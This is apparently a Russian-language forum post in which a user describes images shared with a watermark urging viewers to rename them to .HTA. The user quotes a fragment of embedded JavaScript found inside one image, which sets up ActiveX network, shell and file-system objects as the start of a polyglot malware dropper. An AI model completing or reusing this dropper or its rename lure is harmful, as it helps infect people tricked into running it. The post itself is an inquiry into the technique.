Я заметил новую тенденцию в распространении потенциально небезопасного кода, когда люди публикуют изображение на сервере с водяным знаком, предлагающим изменить имя файла на расширение .HTA.
Я понял, что.HTA - это файл HTML-приложения, которому, по логике Microsoft, неявно доверяют, и он может содержать код, позволяющий делать практически все, что связано с Интернетом.Я открыл файл в своем любимом текстовом редакторе, и, к моему изумлению, в файле изображения был код Javascript!
jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV
//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
Под исходным кодом также есть более искаженные данные изображений.Это всего лишь фрагмент.
Мне очень любопытно узнать, как им удалось добавить код Javascript в файл изображения, не повреждая формат файла изображения и не делая его недоступным для просмотра.Я представил это некоторым из моих сотрудников, и они были одинаково озадачены.